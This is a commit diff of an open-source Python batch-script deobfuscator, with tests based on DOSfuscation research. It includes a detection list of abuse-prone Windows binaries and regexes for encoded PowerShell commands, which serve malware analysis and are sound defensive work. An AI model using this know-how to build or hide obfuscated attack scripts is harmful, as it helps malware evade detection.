Skip to content

Commit f080599

Browse files
authoredOct 24, 2022
Merge pull request #3 from gdesmar/master
Major refactoring
2 parents c092642 + e5598ec commit f080599

File tree

3 files changed

+1371
-83
lines changed

3 files changed

+1371
-83
lines changed
 

‎batch_deobfuscator/batch_interpreter.py

+546-83
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,54 @@
1-
import re
21
import argparse
3-
import os
2+
import base64
43
import copy
4+
import hashlib
5+
import os
6+
import re
7+
import shlex
8+
import shutil
9+
import string
10+
import tempfile
11+
from collections import defaultdict
12+
from urllib.parse import urlparse
13+
14+
QUOTED_CHARS = ["|", ">", "<", '"', "^", "&"]
15+
16+
# Powershell detection
17+
ENC_RE = rb"(?i)(?:-|/)e(?:c|n(?:c(?:o(?:d(?:e(?:d(?:c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?)?)?)?)?)?)?)?$"
18+
PWR_CMD_RE = rb"(?i)(?:-|/)c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?$"
19+
20+
# Gathered from https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2
21+
RARE_LOLBAS = [
22+
"forfiles",
23+
"bash",
24+
"scriptrunner",
25+
"syncappvpublishingserver",
26+
"hh.exe",
27+
"msbuild",
28+
"regsvcs",
29+
"regasm",
30+
"installutil",
31+
"ieexec",
32+
"msxsl",
33+
"odbcconf",
34+
"sqldumper",
35+
"pcalua",
36+
"appvlp",
37+
"runscripthelper",
38+
"infdefaultinstall",
39+
"diskshadow",
40+
"msdt",
41+
"regsvr32",
42+
]
543

644

745
class BatchDeobfuscator:
8-
def __init__(self):
46+
def __init__(self, complex_one_liner_threshold=4):
947
self.variables = {}
1048
self.exec_cmd = []
49+
self.exec_ps1 = []
50+
self.traits = defaultdict(list)
51+
self.complex_one_liner_threshold = complex_one_liner_threshold
1152
if os.name == "nt":
1253
for env_var, value in os.environ.items():
1354
self.variables[env_var.lower()] = value
@@ -22,6 +63,7 @@ def __init__(self):
2263
"computername": "MISCREANTTEARS",
2364
"comspec": "C:\\WINDOWS\\system32\\cmd.exe",
2465
"driverdata": "C:\\Windows\\System32\\Drivers\\DriverData",
66+
"errorlevel": "0", # Because nothing fails.
2567
"fps_browser_app_profile_string": "Internet Explorer",
2668
"fps_browser_user_profile_string": "Default",
2769
"homedrive": "C:",
@@ -32,7 +74,13 @@ def __init__(self):
3274
"number_of_processors": "4",
3375
"onedrive": "C:\\Users\\puncher\\OneDrive",
3476
"os": "Windows_NT",
35-
"path": "C:\\Program Files\\Amazon Corretto\\jdk11.0.7_10\\bin;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\dotnet\\;C:\\Program Files\\Microsoft SQL Server\\130\\Tools\\Binn\\;C:\\Users\\puncher\\AppData\\Local\\Microsoft\\WindowsApps;%USERPROFILE%\\AppData\\Local\\Microsoft\\WindowsApps;",
77+
"path": (
78+
"C:\\Program Files\\Amazon Corretto\\jdk11.0.7_10\\bin;C:\\WINDOWS\\system32;"
79+
"C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;"
80+
"C:\\Program Files\\dotnet\\;C:\\Program Files\\Microsoft SQL Server\\130\\Tools\\Binn\\;"
81+
"C:\\Users\\puncher\\AppData\\Local\\Microsoft\\WindowsApps;"
82+
"%USERPROFILE%\\AppData\\Local\\Microsoft\\WindowsApps;"
83+
),
3684
"pathext": ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC",
3785
"processor_architecture": "AMD64",
3886
"processor_identifier": "Intel Core Ti-83 Family 6 Model 158 Stepping 10, GenuineIntel",
@@ -44,6 +92,7 @@ def __init__(self):
4492
"programw6432": "C:\\Program Files",
4593
"psmodulepath": "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\",
4694
"public": "C:\\Users\\Public",
95+
"random": "4", # https://xkcd.com/221/
4796
"sessionname": "Console",
4897
"systemdrive": "C:",
4998
"systemroot": "C:\\WINDOWS",
@@ -57,8 +106,26 @@ def __init__(self):
57106
"__compat_layer": "DetectorsMessageBoxErrors",
58107
}
59108

109+
# There are 211 lines coming out of curl --help, so I won't be parsing all the options
110+
self.curl_parser = argparse.ArgumentParser()
111+
self.curl_parser.add_argument("-o", "--output", dest="output", help="Write to file instead of stdout")
112+
self.curl_parser.add_argument(
113+
"-O",
114+
"--remote-name",
115+
dest="remote_name",
116+
action="store_true",
117+
help="Write output to a file named as the remote file",
118+
)
119+
self.curl_parser.add_argument("url", help="URL")
120+
# Patch all possible one-character arguments
121+
for char in string.ascii_letters + string.digits + "#:":
122+
try:
123+
self.curl_parser.add_argument(f"-{char}", action="store_true")
124+
except argparse.ArgumentError:
125+
pass
126+
60127
def read_logical_line(self, path):
61-
with open(path, "r", encoding="utf-8") as input_file:
128+
with open(path, "r", encoding="utf-8", errors="ignore") as input_file:
62129
logical_line = ""
63130
for line in input_file:
64131
if not line.endswith("^"):
@@ -68,18 +135,88 @@ def read_logical_line(self, path):
68135
else:
69136
logical_line += line + "\n"
70137

138+
def split_if_statement(self, statement):
139+
if_statement = (
140+
r"(?P<conditional>(?P<if_statement>if)\s+(not\s+)?"
141+
r"(?P<type>errorlevel\s+\d+\s+|exist\s+(\".*\"|[^\s]+)\s+|.+?==.+?\s+|"
142+
r"(\/i\s+)?[^\s]+\s+(equ|neq|lss|leq|gtr|geq)\s+[^\s]+\s+|cmdextversion\s+\d\s+|defined\s+[^\s]+\s+)"
143+
r"(?P<open_paren>\()?)(?P<true_statement>[^\)]*)(?P<close_paren>\))?"
144+
r"(\s+else\s+(\()?\s*(?P<false_statement>[^\)]*)(\))?)?"
145+
)
146+
match = re.search(if_statement, statement, re.IGNORECASE)
147+
if match is not None:
148+
conditional = match.group("conditional")
149+
if match.group("open_paren") is None:
150+
conditional = f"{conditional}("
151+
yield conditional
152+
yield match.group("true_statement")
153+
if match.group("false_statement") is None:
154+
if match.group("open_paren") is None or match.group("close_paren") is not None:
155+
yield ")"
156+
else:
157+
# Got an ELSE statement
158+
if match.group("if_statement") == "if":
159+
yield ") else ("
160+
else:
161+
yield ") ELSE ("
162+
yield match.group("false_statement")
163+
yield ")"
164+
else:
165+
# Broken statement, maybe a re-run
166+
yield statement
167+
168+
def split_for_statement(self, statement):
169+
for_statement = (
170+
r"(?P<loop>(?P<for_statement>for)\s+"
171+
r"(?P<parameter>.+)"
172+
r"\s+IN\s+\((?P<in_set>[^\)]+)\)"
173+
r"\s+DO\s+"
174+
r"(?P<open_paren>\()?)(?P<command>[^\)]*)(?P<close_paren>\))?"
175+
)
176+
match = re.search(for_statement, statement, re.IGNORECASE)
177+
if match is not None:
178+
loop = match.group("loop")
179+
if match.group("open_paren") is None:
180+
loop = f"{loop}("
181+
yield loop
182+
yield match.group("command")
183+
if match.group("open_paren") is None or match.group("close_paren") is not None:
184+
yield ")"
185+
else:
186+
# Broken statement, maybe a re-run
187+
yield statement
188+
189+
def get_commands_special_statement(self, statement):
190+
if statement.lower().startswith("if "):
191+
for part in self.split_if_statement(statement):
192+
if part.strip() != "":
193+
yield part
194+
elif statement.lower().startswith("for "):
195+
for part in self.split_for_statement(statement):
196+
if part.strip() != "":
197+
yield part
198+
else:
199+
yield statement
200+
71201
def get_commands(self, logical_line):
72202
state = "init"
73203
counter = 0
74204
start_command = 0
75205
for char in logical_line:
206+
# print(f"C:{char}, S:{state}")
76207
if state == "init": # init state
77208
if char == '"': # quote is on
78209
state = "str_s"
79210
elif char == "^":
80211
state = "escape"
212+
elif char == "&" and logical_line[counter - 1] == ">":
213+
# Usually an output redirection, we want to keep it on the same line
214+
pass
81215
elif char == "&" or char == "|":
82-
yield logical_line[start_command:counter].strip()
216+
cmd = logical_line[start_command:counter].strip()
217+
if cmd != "":
218+
for part in self.get_commands_special_statement(cmd):
219+
yield part
83220
start_command = counter + 1
84221
elif state == "str_s":
85222
if char == '"':
@@ -91,37 +228,187 @@ def get_commands(self, logical_line):
91228

92229
last_com = logical_line[start_command:].strip()
93230
if last_com != "":
94-
yield last_com
231+
for part in self.get_commands_special_statement(last_com):
232+
yield part
95233

96234
def get_value(self, variable):
97235

98-
str_substitution = r"%\s*(?P<variable>[A-Za-z0-9#$'()*+,-.?@\[\]_`{}~ ]+)" r"(:~\s*(?P<index>[+-]?\d+)\s*,\s*(?P<length>[+-]?\d+)\s*)?%"
236+
str_substitution = (
237+
r"([%!])(?P<variable>[\"^|!\w#$'()*+,-.?@\[\]`{}~\s+]+)"
238+
r"("
239+
r"(:~\s*(?P<index>[+-]?\d+)\s*(?:,\s*(?P<length>[+-]?\d+))?\s*)|"
240+
r"(:(?P<s1>[^=]+)=(?P<s2>[^=]*))"
241+
r")?(\1)"
242+
)
99243

100244
matches = re.finditer(str_substitution, variable, re.MULTILINE)
101245

102246
value = ""
103247

104248
for matchNum, match in enumerate(matches):
105-
if len(match.groups()) == 4:
106-
var_name = match.group("variable").lower()
107-
if var_name in self.variables:
108-
value = self.variables[var_name]
109-
if match.group("index") is not None:
110-
index = int(match.group("index"))
249+
var_name = match.group("variable").lower()
250+
if var_name in self.variables:
251+
value = self.variables[var_name]
252+
if match.group("index") is not None:
253+
index = int(match.group("index"))
254+
if index < 0 and -index >= len(value):
255+
index = 0
256+
elif index < 0:
257+
index = len(value) + index
258+
if match.group("length") is not None:
111259
length = int(match.group("length"))
112-
if length >= 0:
113-
value = value[index : index + length]
114-
else:
115-
value = value[index:length]
260+
else:
261+
length = len(value) - index
262+
if length >= 0:
263+
value = value[index : index + length]
264+
else:
265+
value = value[index:length]
266+
elif match.group("s1") is not None:
267+
s1 = match.group("s1")
268+
s2 = match.group("s2")
269+
if s1.startswith("*") and s1[1:].lower() in value.lower():
270+
value = f"{s2}{value[value.lower().index(s1[1:].lower())+len(s1)-1:]}"
271+
else:
272+
pattern = re.compile(re.escape(s1), re.IGNORECASE)
273+
value = pattern.sub(re.escape(s2), value)
274+
else:
275+
# It should be "variable", and interpret the empty echo later, but that would need a better simulator
276+
return value
277+
278+
if value == "^":
279+
return value
280+
return value.rstrip("^")
281+
282+
def interpret_set(self, cmd):
283+
state = "init"
284+
option = None
285+
var_name = ""
286+
var_value = ""
287+
quote = None
288+
old_state = None
289+
stop_parsing = len(cmd)
290+
291+
for idx, char in enumerate(cmd):
292+
# print(f"{idx}. C: {char} S: {state}, {var_value}")
293+
if idx >= stop_parsing:
294+
break
295+
if state == "init":
296+
if char == " ":
297+
continue
298+
elif char == "/":
299+
state = "option"
300+
elif char == '"':
301+
quote = '"'
302+
stop_parsing = cmd.rfind('"')
303+
if idx == stop_parsing:
304+
stop_parsing = len(cmd)
305+
state = "var"
306+
elif char == "^":
307+
old_state = state
308+
state = "escape"
116309
else:
117-
# if variable name is not set, return the variable
118-
# value = variable
119-
return value
310+
state = "var"
311+
var_name += char
312+
elif state == "option":
313+
option = char.lower()
314+
state = "init"
315+
elif state == "var":
316+
if char == "=":
317+
state = "value"
318+
elif not quote and char == '"':
319+
quote = '"'
320+
var_name += char
321+
elif char == "^":
322+
old_state = state
323+
state = "escape"
324+
else:
325+
var_name += char
326+
elif state == "value":
327+
if char == "^":
328+
old_state = state
329+
state = "escape"
330+
else:
331+
var_value += char
332+
elif state == "escape":
333+
if old_state == "init":
334+
if char == '"':
335+
quote = '^"'
336+
stop_parsing = cmd.rfind('"')
337+
if idx == stop_parsing:
338+
stop_parsing = len(cmd)
339+
state = "init"
340+
old_state = None
341+
else:
342+
state = "var"
343+
var_name += char
344+
old_state = None
345+
elif old_state == "var":
346+
if quote == '"' and char in QUOTED_CHARS:
347+
var_name += "^"
348+
if not quote and char == '"':
349+
quote = '^"'
350+
var_name += char
351+
state = old_state
352+
old_state = None
353+
elif old_state == "value":
354+
var_value += char
355+
state = old_state
356+
old_state = None
357+
358+
if option == "a":
359+
var_name = var_name.strip(" ")
360+
for char in QUOTED_CHARS:
361+
var_name = var_name.replace(char, "")
362+
var_value = f"({var_value.strip(' ')})"
363+
elif option == "p":
364+
var_value = "__input__"
365+
366+
var_name = var_name.lstrip(" ")
367+
if not quote:
368+
var_name = var_name.lstrip('^"').replace('^"', '"')
369+
370+
return (var_name, var_value)
371+
372+
def interpret_curl(self, cmd):
373+
# Batch specific obfuscation that is not handled before for echo/variable purposes, can be stripped here
374+
cmd = cmd.replace('""', "")
375+
split_cmd = shlex.split(cmd, posix=False)
376+
args, unknown = self.curl_parser.parse_known_args(split_cmd[1:])
120377

121-
return value
378+
dst = args.output
379+
if args.remote_name:
380+
dst = os.path.basename(urlparse(args.url).path)
381+
382+
self.traits["download"].append((cmd, {"src": args.url, "dst": dst}))
383+
384+
def interpret_powershell(self, normalized_comm):
385+
try:
386+
ori_cmd = shlex.split(normalized_comm)
387+
cmd = shlex.split(normalized_comm.lower())
388+
except ValueError:
389+
return
390+
391+
ps1_cmd = None
392+
for idx, part in enumerate(cmd):
393+
if re.match(ENC_RE, part.encode()):
394+
ps1_cmd = base64.b64decode(ori_cmd[idx + 1]).replace(b"\x00", b"")
395+
break
396+
elif re.match(PWR_CMD_RE, part.encode()):
397+
ps1_cmd = ori_cmd[idx + 1].encode()
398+
break
399+
if ps1_cmd is None:
400+
ps1_cmd = ori_cmd[-1].encode()
401+
402+
if ps1_cmd:
403+
self.exec_ps1.append(ps1_cmd.strip(b'"'))
122404

123405
def interpret_command(self, normalized_comm):
124-
normalized_comm = normalized_comm.strip()
406+
if normalized_comm[:3].lower() == "rem":
407+
return
408+
409+
# We need to keep the last space in case the command is "set EXP=43 " so that the value will be "43 "
410+
# normalized_comm = normalized_comm.strip()
411+
125412
# remove paranthesis
126413
index = 0
127414
last = len(normalized_comm) - 1
@@ -135,58 +422,98 @@ def interpret_command(self, normalized_comm):
135422
index += 1
136423
normalized_comm = normalized_comm[index : last + 1]
137424

138-
if normalized_comm.lower().startswith("cmd"):
139-
set_command = r"\s*(call)?cmd(.exe)?\s*((\/A|\/U|\/Q|\/D)\s+|((\/E|\/F|\/V):(ON|OFF))\s*)*(\/c|\/r)\s*(?P<cmd>.*)"
140-
match = re.search(set_command, normalized_comm, re.IGNORECASE)
425+
if not normalized_comm:
426+
return
427+
428+
if normalized_comm[0] == "@":
429+
normalized_comm = normalized_comm[1:]
430+
431+
normalized_comm_lower = normalized_comm.lower()
432+
if normalized_comm_lower.startswith("call"):
433+
# TODO: Not a perfect interpretation as the @ sign of the recursive command shouldn't be remove
434+
# This shouldn't work:
435+
# call @set EXP=43
436+
# But this should:
437+
# call set EXP=43
438+
self.interpret_command(normalized_comm[5:])
439+
return
440+
441+
if normalized_comm_lower.startswith("start"):
442+
start_re = (
443+
r"start(.exe)?"
444+
r"(\/min|\/max|\/wait|\/low|\/normal|\/abovenormal|\/belownormal|\/high|\/realtime|\/b|\/i|\/w|\s+)*"
445+
# TODO: Add Node + Affinity options
446+
# TODO: Add title + path keys
447+
r"(?P<cmd>.*)"
448+
)
449+
match = re.match(start_re, normalized_comm, re.IGNORECASE)
141450
if match is not None and match.group("cmd") is not None:
142-
cmd = match.group("cmd").strip('"')
143-
self.exec_cmd.append(cmd)
451+
self.interpret_command(match.group("cmd"))
452+
return
144453

145-
else:
454+
if normalized_comm_lower.startswith("cmd"):
455+
cmd_command = r"cmd(.exe)?\s*((\/A|\/U|\/Q|\/D)\s+|((\/E|\/F|\/V):(ON|OFF))\s*)*(\/c|\/r)\s*(?P<cmd>.*)"
456+
match = re.search(cmd_command, normalized_comm, re.IGNORECASE)
457+
if match is not None and match.group("cmd") is not None:
458+
self.exec_cmd.append(match.group("cmd").strip('"'))
459+
return
460+
461+
if normalized_comm_lower.startswith("setlocal"):
462+
# Just so we don't go into the set command
463+
return
464+
465+
if normalized_comm_lower.startswith("set"):
146466
# interpreting set command
147-
set_command = (
148-
r"(\s*(call)?\s*set\s+\"?(?P<var>[A-Za-z0-9#$'()*+,-.?@\[\]_`{}~ ]+)=\s*(?P<val>[^\"\n]*)\"?)|"
149-
r"(\s*(call)?\s*set\s+/p\s+\"?(?P<input>[A-Za-z0-9#$'()*+,-.?@\[\]_`{}~ ]+)=[^\"\n]*\"?)"
150-
)
151-
match = re.search(set_command, normalized_comm, re.IGNORECASE)
152-
if match is not None:
153-
if match.group("input") is not None:
154-
self.variables[match.group("input")] = "__input__"
155-
else:
156-
self.variables[match.group("var").lower()] = match.group("val")
467+
var_name, var_value = self.interpret_set(normalized_comm[3:])
468+
if var_value == "":
469+
if var_name.lower() in self.variables:
470+
del self.variables[var_name.lower()]
471+
else:
472+
self.variables[var_name.lower()] = var_value
473+
return
474+
475+
if normalized_comm_lower.startswith("curl"):
476+
self.interpret_curl(normalized_comm)
477+
478+
if normalized_comm_lower.startswith("powershell"):
479+
self.interpret_powershell(normalized_comm)
157480

158481
# pushdown automata
159482
def normalize_command(self, command):
483+
if command[:3].lower() == "rem":
484+
return command
485+
160486
state = "init"
161-
counter = 0
162487
normalized_com = ""
163488
stack = []
489+
traits = {"start_with_var": False, "var_used": 0}
164490
for char in command:
491+
# print(f"C:{char} S:{state} N:{normalized_com}")
165492
if state == "init": # init state
166493
if char == '"': # quote is on
167494
state = "str_s"
168495
if normalized_com and normalized_com[-1] == '"':
169496
normalized_com = normalized_com[:-1]
170497
else:
171498
normalized_com += char
172-
elif char == "," or char == ";" or char == "\t":
499+
elif char == "," or char == ";": # or char == "\t": EDIT: How about we keep those tabs?
173500
# commas (",") are replaced by spaces, unless they are part of a string in doublequotes
174501
# semicolons (";") are replaced by spaces, unless they are part of a string in doublequotes
175502
# tabs are replaced by a single space
176503
# http://www.robvanderwoude.com/parameters.php
177504
normalized_com += " "
178505
elif char == "^": # next character must be escaped
506+
stack.append(state)
179507
state = "escape"
180-
stack.append("init")
181508
elif char == "%": # variable start
182509
variable_start = len(normalized_com)
183-
normalized_com += "%"
184-
stack.append("init")
510+
normalized_com += char
511+
stack.append(state)
185512
state = "var_s"
186513
elif char == "!":
187514
variable_start = len(normalized_com)
188-
normalized_com += "%"
189-
stack.append("init")
515+
normalized_com += char
516+
stack.append(state)
190517
state = "var_s_2"
191518
else:
192519
normalized_com += char
@@ -196,12 +523,12 @@ def normalize_command(self, command):
196523
normalized_com += char
197524
elif char == "%":
198525
variable_start = len(normalized_com)
199-
normalized_com += "%"
526+
normalized_com += char
200527
stack.append("str_s")
201528
state = "var_s" # seen %
202529
elif char == "!":
203530
variable_start = len(normalized_com)
204-
normalized_com += "%"
531+
normalized_com += char
205532
stack.append("str_s")
206533
state = "var_s_2" # seen !
207534
elif char == "^":
@@ -210,58 +537,192 @@ def normalize_command(self, command):
210537
else:
211538
normalized_com += char
212539
elif state == "var_s":
213-
if char == "%" and normalized_com[-1] != "%":
214-
normalized_com += "%"
215-
# print('<substring>{}</substring>'.format(command[variable_start:counter + 1]), end='')
216-
value = self.get_value(normalized_com[variable_start:].lower())
540+
if char == "%" and normalized_com[-1] != char:
541+
normalized_com += char
542+
value = self.get_value(normalized_com[variable_start:])
217543
normalized_com = normalized_com[:variable_start]
218-
normalized_com += value
544+
if len(normalized_com) == 0:
545+
traits["start_with_var"] = True
546+
normalized_com += self.normalize_command(value)
547+
traits["var_used"] += 1
219548
state = stack.pop()
220-
elif char == "%":
549+
elif char == "%": # Two % in a row
221550
normalized_com += char
222-
variable_start = counter
223-
elif char == '"':
224-
if stack[-1] == "str_s":
225-
normalized_com += char
226-
stack.pop()
227-
state = "init"
228-
else:
229-
normalized_com += char
551+
state = stack.pop()
230552
elif char == "^":
231-
state = "escape"
232-
stack.append("var_s")
553+
# Do not escape in vars?
554+
# state = "escape"
555+
# stack.append("var_s")
556+
normalized_com += char
557+
elif char == "*" and len(normalized_com) == variable_start + 1:
558+
# Assume no parameter were passed
559+
normalized_com = normalized_com[:variable_start]
560+
state = stack.pop()
561+
elif char.isdigit() and normalized_com[variable_start:] in [
562+
"%",
563+
"%~",
564+
"%~f",
565+
"%~d",
566+
"%~p",
567+
"%~n",
568+
"%~x",
569+
"%~s",
570+
"%~a",
571+
"%~t",
572+
"%~z",
573+
]:
574+
# https://www.programming-books.io/essential/batch/-percent-tilde-f4263820c2db41e399c77259970464f1.html
575+
# TODO: Better handling of letter combination (i.e. %~xsa0)
576+
# Could also return different values of script.bat if we want to parse the options
577+
normalized_com += char
578+
if char == "0":
579+
value = "script.bat"
580+
else:
581+
value = "" # Assume no parameter were passed
582+
normalized_com = normalized_com[:variable_start]
583+
normalized_com += value
584+
state = stack.pop()
233585
else:
234586
normalized_com += char
235587
elif state == "var_s_2":
236-
if char == "!" and normalized_com[-1] != "%":
237-
normalized_com += "%"
238-
# print('<substring>{}</substring>'.format(command[variable_start:counter + 1]), end='')
239-
value = self.get_value(normalized_com[variable_start:].lower())
588+
if char == "!" and normalized_com[-1] != char:
589+
normalized_com += char
590+
value = self.get_value(normalized_com[variable_start:])
240591
normalized_com = normalized_com[:variable_start]
241-
normalized_com += value
592+
if len(normalized_com) == 0:
593+
traits["start_with_var"] = True
594+
normalized_com += self.normalize_command(value)
595+
traits["var_used"] += 1
242596
state = stack.pop()
243597
elif char == "!":
244598
normalized_com += char
245-
variable_start = counter
246-
elif char == '"':
247-
if stack[-1] == "str_s":
248-
normalized_com += char
249-
stack.pop()
250-
state = "init"
251-
else:
252-
normalized_com += char
253599
elif char == "^":
254600
state = "escape"
255-
stack.append("var_s")
601+
stack.append("var_s_2")
256602
else:
257603
normalized_com += char
258604
elif state == "escape":
605+
if char in QUOTED_CHARS:
606+
normalized_com += "^"
259607
normalized_com += char
260608
state = stack.pop()
609+
if char == "%":
610+
if state == "var_s":
611+
value = self.get_value(normalized_com[variable_start:])
612+
normalized_com = normalized_com[:variable_start]
613+
if len(normalized_com) == 0:
614+
traits["start_with_var"] = True
615+
normalized_com += self.normalize_command(value)
616+
traits["var_used"] += 1
617+
state = stack.pop()
618+
else:
619+
variable_start = len(normalized_com) - 1
620+
stack.append(state)
621+
state = "var_s"
622+
elif char == "!":
623+
if state == "var_s_2":
624+
value = self.get_value(normalized_com[variable_start:])
625+
normalized_com = normalized_com[:variable_start]
626+
if len(normalized_com) == 0:
627+
traits["start_with_var"] = True
628+
normalized_com += self.normalize_command(value)
629+
traits["var_used"] += 1
630+
state = stack.pop()
631+
else:
632+
variable_start = len(normalized_com) - 1
633+
stack.append(state)
634+
state = "var_s_2"
635+
636+
if state in ["var_s", "var_s_2"]:
637+
normalized_com = normalized_com[:variable_start] + normalized_com[variable_start + 1 :]
638+
if state == "escape":
639+
normalized_com += "^"
640+
641+
if traits["start_with_var"]:
642+
self.traits["start_with_var"].append((command, normalized_com))
643+
self.traits["var_used"].append((command, normalized_com, traits["var_used"]))
261644

262-
counter += 1
263645
return normalized_com
264646

647+
def analyze_logical_line(self, logical_line, working_directory, f, extracted_files):
648+
commands = self.get_commands(logical_line)
649+
for command in commands:
650+
normalized_comm = self.normalize_command(command)
651+
if len(list(self.get_commands(normalized_comm))) > 1:
652+
self.traits["command-grouping"].append({"Command": command, "Normalized": normalized_comm})
653+
self.analyze_logical_line(normalized_comm, working_directory, f, extracted_files)
654+
else:
655+
self.interpret_command(normalized_comm)
656+
f.write(normalized_comm)
657+
f.write("\n")
658+
for lolbas in RARE_LOLBAS:
659+
if lolbas in normalized_comm:
660+
self.traits["LOLBAS"].append({"LOLBAS": lolbas, "Command": normalized_comm})
661+
if len(self.exec_cmd) > 0:
662+
for child_cmd in self.exec_cmd:
663+
child_deobfuscator = copy.deepcopy(self)
664+
child_deobfuscator.exec_cmd.clear()
665+
child_fd, child_path = tempfile.mkstemp(suffix=".bat", prefix="child_", dir=working_directory)
666+
with open(child_path, "w") as child_f:
667+
child_deobfuscator.analyze_logical_line(
668+
child_cmd, working_directory, child_f, extracted_files
669+
)
670+
with open(child_path, "rb") as cmd_f:
671+
sha256hash = hashlib.sha256(cmd_f.read()).hexdigest()
672+
bat_filename = f"{sha256hash[0:10]}.bat"
673+
shutil.move(child_path, os.path.join(working_directory, bat_filename))
674+
extracted_files["batch"].append((bat_filename, sha256hash))
675+
self.exec_cmd.clear()
676+
if len(self.exec_ps1) > 0:
677+
for child_ps1 in self.exec_ps1:
678+
sha256hash = hashlib.sha256(child_ps1).hexdigest()
679+
if any(
680+
extracted_file_hash == sha256hash
681+
for _, extracted_file_hash in extracted_files.get("powershell", [])
682+
):
683+
continue
684+
powershell_filename = f"{sha256hash[0:10]}.ps1"
685+
powershell_file_path = os.path.join(working_directory, powershell_filename)
686+
with open(powershell_file_path, "wb") as ps1_f:
687+
ps1_f.write(child_ps1)
688+
extracted_files["powershell"].append((powershell_filename, sha256hash))
689+
self.exec_ps1.clear()
690+
691+
def analyze(self, file_path, working_directory):
692+
extracted_files = defaultdict(list)
693+
694+
file_name = "deobfuscated_bat.bat"
695+
temp_path = os.path.join(working_directory, file_name)
696+
with open(temp_path, "w") as f:
697+
for logical_line in self.read_logical_line(file_path):
698+
self.analyze_logical_line(logical_line, working_directory, f, extracted_files)
699+
700+
# Figure out if we're dealing with a Complex One-Liner
701+
# Ignore empty lines to determine if it is a One-Liner
702+
self.traits["one-liner"] = False
703+
with open(file_path, "r", encoding="utf-8", errors="ignore") as f:
704+
firstline = False
705+
for line in f:
706+
if line.strip():
707+
if not firstline:
708+
self.traits["one-liner"] = True
709+
firstline = True
710+
else:
711+
self.traits["one-liner"] = False
712+
break
713+
714+
with open(temp_path, "rb") as f:
715+
deobfuscated_data = f.read()
716+
if self.traits["one-liner"]:
717+
resulting_line_count = deobfuscated_data.count(b"\n")
718+
if resulting_line_count >= self.complex_one_liner_threshold:
719+
self.traits["complex-one-liner"] = resulting_line_count
720+
sha256hash = hashlib.sha256(deobfuscated_data).hexdigest()
721+
bat_filename = f"{sha256hash[0:10]}_deobfuscated.bat"
722+
shutil.move(temp_path, os.path.join(working_directory, bat_filename))
723+
724+
return bat_filename, extracted_files
725+
265726

266727
def interpret_logical_line(deobfuscator, logical_line, tab=""):
267728
commands = deobfuscator.get_commands(logical_line)
@@ -270,12 +731,13 @@ def interpret_logical_line(deobfuscator, logical_line, tab=""):
270731
deobfuscator.interpret_command(normalized_comm)
271732
print(tab + normalized_comm)
272733
if len(deobfuscator.exec_cmd) > 0:
273-
print(tab + "[CHILE CMD]")
734+
print(tab + "[CHILD CMD]")
274735
for child_cmd in deobfuscator.exec_cmd:
275736
child_deobfuscator = copy.deepcopy(deobfuscator)
276737
child_deobfuscator.exec_cmd.clear()
277738
interpret_logical_line(child_deobfuscator, child_cmd, tab=tab + "\t")
278-
print(tab + "[END OF CHILE CMD]")
739+
deobfuscator.exec_cmd.clear()
740+
print(tab + "[END OF CHILD CMD]")
279741

280742

281743
def interpret_logical_line_str(deobfuscator, logical_line, tab=""):
@@ -286,12 +748,13 @@ def interpret_logical_line_str(deobfuscator, logical_line, tab=""):
286748
deobfuscator.interpret_command(normalized_comm)
287749
str = str + tab + normalized_comm
288750
if len(deobfuscator.exec_cmd) > 0:
289-
str = str + tab + "[CHILE CMD]"
751+
str = str + tab + "[CHILD CMD]"
290752
for child_cmd in deobfuscator.exec_cmd:
291753
child_deobfuscator = copy.deepcopy(deobfuscator)
292754
child_deobfuscator.exec_cmd.clear()
293755
interpret_logical_line(child_deobfuscator, child_cmd, tab=tab + "\t")
294-
str = str + tab + "[END OF CHILE CMD]"
756+
deobfuscator.exec_cmd.clear()
757+
str = str + tab + "[END OF CHILD CMD]"
295758
return str
296759

297760

‎tests/test_FE_DOSfuscation.py

+216
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,216 @@
1+
# Tests coming from the FireEye DOSfuscation research
2+
# https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf
3+
import pytest
4+
5+
from batch_deobfuscator.batch_interpreter import BatchDeobfuscator
6+
7+
8+
class TestUnittests:
9+
@staticmethod
10+
@pytest.mark.parametrize(
11+
"logical_line, result",
12+
[
13+
(
14+
",;,cmd.exe,;,/c,;,echo;Command 1&&echo,Command 2",
15+
[" cmd.exe /c echo Command 1", "echo Command 2"],
16+
),
17+
],
18+
)
19+
def test_comma_semi_colon(logical_line, result):
20+
deobfuscator = BatchDeobfuscator()
21+
commands = deobfuscator.get_commands(logical_line)
22+
res = []
23+
for command in commands:
24+
normalized_comm = deobfuscator.normalize_command(command)
25+
deobfuscator.interpret_command(normalized_comm)
26+
res.append(normalized_comm)
27+
28+
assert len(res) == len(result)
29+
for test_res, expected_res in zip(res, result):
30+
assert test_res == expected_res
31+
32+
@staticmethod
33+
@pytest.mark.parametrize(
34+
"statement, result",
35+
[
36+
# Substring
37+
("%COMSPEC%", "C:\\WINDOWS\\system32\\cmd.exe"),
38+
("%COMSPEC:~0%", "C:\\WINDOWS\\system32\\cmd.exe"),
39+
("%COMSPEC:~0,27%", "C:\\WINDOWS\\system32\\cmd.exe"),
40+
("%COMSPEC:~-7%", "cmd.exe"),
41+
("%COMSPEC:~-27%", "C:\\WINDOWS\\system32\\cmd.exe"),
42+
("%COMSPEC:~-7,-4%", "cmd"),
43+
("%COMSPEC:~-27,27%", "C:\\WINDOWS\\system32\\cmd.exe"),
44+
("%COMSPEC:~-7,3%", "cmd"),
45+
("%COMSPEC:~0,1337%", "C:\\WINDOWS\\system32\\cmd.exe"),
46+
("%COMSPEC:~-1337%", "C:\\WINDOWS\\system32\\cmd.exe"),
47+
("%COMSPEC:~-1337,1337%", "C:\\WINDOWS\\system32\\cmd.exe"),
48+
("%COMSPEC:~-40,3%", "C:\\"),
49+
("%COMSPEC:~-1,1%", "e"),
50+
# Substitution
51+
